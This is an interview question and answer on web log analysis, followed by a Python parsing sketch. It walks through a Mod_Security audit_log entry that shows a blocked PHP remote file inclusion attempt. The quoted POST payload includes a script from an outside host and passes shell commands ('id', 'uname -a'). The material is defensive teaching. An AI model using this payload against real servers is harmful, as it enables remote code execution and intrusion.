Interview Questions Answers.ORG
Interviewer And Interviewee Guide
Computer security Interview Question:
What application generated the log file entry below? What type of attack is this? Assuming the index.php program is vulnerable, was this attack successful?
Submitted by: Administrator
========================================
Request: 200.158.8.207 - - [09/Oct/2004:19:40:46 --0400] "POST /index.php HTTP/1.1" 403 743
Handler: cgi-script
----------------------------------------
POST /index.php HTTP/1.1
Host: www.foo.com
Connection: keep-alive
Accept: */*
Accept-Language: en-us
Content-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla 4.0 (Linux)
Content-Length: 65
X-Forwarded-For: 200.158.8.207
mod_security-message: Access denied with code 403. Pattern match "uname\x20-a" at POST_PAYLOAD
mod_security-action: 403
65
lid=http://th3.ownz.p5.org.uk/lila.jpg?&cmd=cd /tmp;id;lsuname -a
----------------------------------------
Note: The goal of this question is to verify that the applicant can interpret various web log files, identify attacks and assess their possible impact. The Mod_Security Apache module generated this data in the audit_log file. The log entry indicates that an attacker is attempting to exploit a PHP file inclusion vulnerability in the index.php script. The commands being passed are in the POST payload of the request. This attack was not successful for the following two reasons:
· The mod_security-message header indicates that Mod_Security blocked this request based on a converted Snort web-attack rule when it identified the "uname -a" data in the POST PAYLOAD.
· The attacker also made a typo in the OS commands being passed in the POST PAYLOAD. She did not include a semicolon ";" between the ls and uname commands. The target host would fail to execute the "lsuname" command.
Submitted by: Administrator
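The reasoning in the answer can be checked mechanically. The following Python sketch is an added example, not part of the original page: it parses the audit_log entry and reports the block decision, the body length, the rule hit, the remote-include parameter and the command tokens. The function name triage is hypothetical, the entry is abridged to the headers the analysis uses, and the matched pattern is written with its \x20 escape.

```python
import re

# Entry from the page, abridged to the headers the analysis uses; the matched
# pattern is written with its \x20 escape (an assumption about the original log).
ENTRY = r'''========================================
Request: 200.158.8.207 - - [09/Oct/2004:19:40:46 --0400] "POST /index.php HTTP/1.1" 403 743
Handler: cgi-script
----------------------------------------
POST /index.php HTTP/1.1
Host: www.foo.com
Content-Length: 65
mod_security-message: Access denied with code 403. Pattern match "uname\x20-a" at POST_PAYLOAD
mod_security-action: 403
65
lid=http://th3.ownz.p5.org.uk/lila.jpg?&cmd=cd /tmp;id;lsuname -a
----------------------------------------
'''

HEADER = re.compile(r'^([\w-]+): (.*)$')

def triage(entry):
    """Parse one audit_log entry and return the facts the answer relies on."""
    summary, request, *_ = re.split(r'^-{10,}\n', entry, flags=re.M)
    status = int(re.search(r'" (\d{3}) \d+$', summary, flags=re.M).group(1))
    lines = request.splitlines()[1:]              # skip the request line
    headers = {}
    while lines and (m := HEADER.match(lines[0])):
        headers[m.group(1).lower()] = m.group(2)
        lines.pop(0)
    declared, payload = int(lines[0]), lines[1]   # body length, then body
    params = dict(p.split('=', 1) for p in payload.split('&') if '=' in p)
    rule = re.search(r'Pattern match "([^"]*)"', headers['mod_security-message'])
    hit = re.search(rule.group(1), payload)       # replay the rule on the body
    return {
        'blocked': status == 403 and headers.get('mod_security-action') == '403',
        'length_ok': declared == len(payload.encode()) == int(headers['content-length']),
        'rule_hit': hit.group(0) if hit else None,
        'remote_include_params': [k for k, v in params.items()
                                  if re.match(r'https?://', v)],
        'commands': [c.strip() for c in params.get('cmd', '').split(';')],
    }

if __name__ == '__main__':
    for key, value in triage(ENTRY).items():
        print(f'{key}: {value}')
```

The last command token comes back as "lsuname -a", a single unknown command, while the rule still fires because it matches the substring "uname -a" inside it.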